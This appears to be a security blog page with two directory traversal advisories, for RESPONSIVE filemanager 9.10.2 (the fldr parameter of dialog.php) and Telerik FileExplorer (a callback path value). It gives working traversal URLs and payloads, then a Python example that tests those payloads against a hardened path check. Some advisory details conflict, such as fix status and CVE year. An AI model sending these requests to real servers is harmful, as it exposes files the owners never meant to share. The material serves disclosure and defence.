RESPONSIVE filemanager <= 9.10.2 - Directory Traversal
Advisory: Directory Traversal in RESPONSIVE filemanager on Windows Server
During a penetration test we discovered a directory traversal vulnerability
in RESPONSIVE filemanager. By supplying a relative path in the fldr parameter of
dialog.php, an attacker can list arbitrary directories outside the configured upload root.
Details
=======
Product: RESPONSIVE filemanager
Affected Versions: RESPONSIVE filemanager v9.10.2
Fixed Versions: Not yet
Vulnerability Type: Directory Traversal
Vendor URL:
http://www.responsivefilemanager.com/
Software Link:
https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.10.2/responsive_filemanager.zip
Vendor Status: fixed version released
Advisory URL: http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html
Tested on: Windows Server
CVE: CVE-2014-2575
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575
Attack Detail
=============
[URL]/filemanager/dialog.php?editor=tinymce&type=&lang=&popup=0&field_id=&relative_url=0&akey=key&fldr=..\
The payload uses backslashes because the target runs on Windows, where the path API accepts them as separators; each additional ..\ climbs one directory further:
fldr=..\..\..\
Thursday, 9 June 2016
Wednesday, 12 November 2014
Telerik File Explorer Directory Traversal
# Exploit Title: Telerik FileExplorer Directory Traversal
# Date: 12/11/2014
# Exploit Author: Kerz
# Vendor Homepage: www.telerik.com
# Software Link: http://www.telerik.com/products/aspnet-ajax.aspx
# Version: Q3 2014
# Tested on: Windows OS
# CVE: None
The malicious user sends a crafted callback request whose path parameter walks up out of the configured root directory, as follows:
http://target_URL/FileExplorer.aspx
[POST Data]
&__CALLBACKPARAM -> "path":"../../"
Thanks
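Both advisories above come down to the same bug: a client-supplied folder string (fldr in RESPONSIVE filemanager, path in the Telerik callback) is joined onto the server's root without checking where the result lands. The following is an added example, not code from either product or from the original post, that reproduces the naive join beside a containment check and runs both over the two published payloads plus the variants a tester should try (mixed separators, an absolute path, a UNC path). The root directory and the request list are constructed for the demonstration; ntpath is used so the Windows semantics hold on any host.

```python
"""Path containment check for a web file manager's folder parameter.

Added example, not code from RESPONSIVE filemanager or Telerik. It mimics
the fldr / path handling described in the advisories and shows why a naive
join is exploitable on Windows, where both '\\' and '/' are separators.
ntpath gives Windows path semantics regardless of the host OS.
"""
import ntpath

# Hypothetical upload root for the demonstration (constructed, not from the page).
ROOT = r"C:\inetpub\wwwroot\source"


def naive_resolve(root, fldr):
    """The vulnerable pattern: trust the client-supplied folder and join it."""
    return ntpath.normpath(ntpath.join(root, fldr))


def safe_resolve(root, fldr):
    """Return the normalized target if it stays under root, else None.

    - ntpath.join lets an absolute or UNC fldr discard root entirely,
      so containment must be checked on the *result*, never on the input.
    - normcase lowercases and folds '/' to '\\' (Windows is case-insensitive).
    """
    root_n = ntpath.normcase(ntpath.normpath(root))
    target = ntpath.normpath(ntpath.join(root, fldr))
    target_n = ntpath.normcase(target)
    if target_n == root_n or target_n.startswith(root_n.rstrip("\\") + "\\"):
        return target
    return None


def escapes_root(root, fldr):
    """True when the request would have been served from outside root."""
    return safe_resolve(root, fldr) is None


# Constructed requests: the two traversal payloads from the advisories plus
# mixed-separator and absolute-path variants a tester should also try.
SAMPLE_REQUESTS = [
    "images",           # legitimate subfolder
    "..\\",             # RESPONSIVE filemanager advisory: fldr=..\
    "..\\..\\..\\",     # fldr=..\..\..\
    "../../",           # Telerik advisory: "path":"../../"
    "images/../../",    # mixed separators, normalised by Windows
    "C:\\Windows",      # absolute path: join() drops the root
    "\\\\evil\\share",  # UNC path, likewise
]


def audit(root=ROOT, requests=SAMPLE_REQUESTS):
    """Map each request to (naive target, accepted by the hardened check?)."""
    return {r: (naive_resolve(root, r), not escapes_root(root, r)) for r in requests}


if __name__ == "__main__":
    for req, (naive, ok) in audit().items():
        print(f"{req!r:20} naive -> {naive!r:40} hardened accepts: {ok}")
```

The hardened check deliberately normalizes the joined result rather than filtering ".." out of the input: a denylist on the input misses mixed separators, absolute paths and UNC paths, all of which ntpath.join happily resolves to somewhere outside the root.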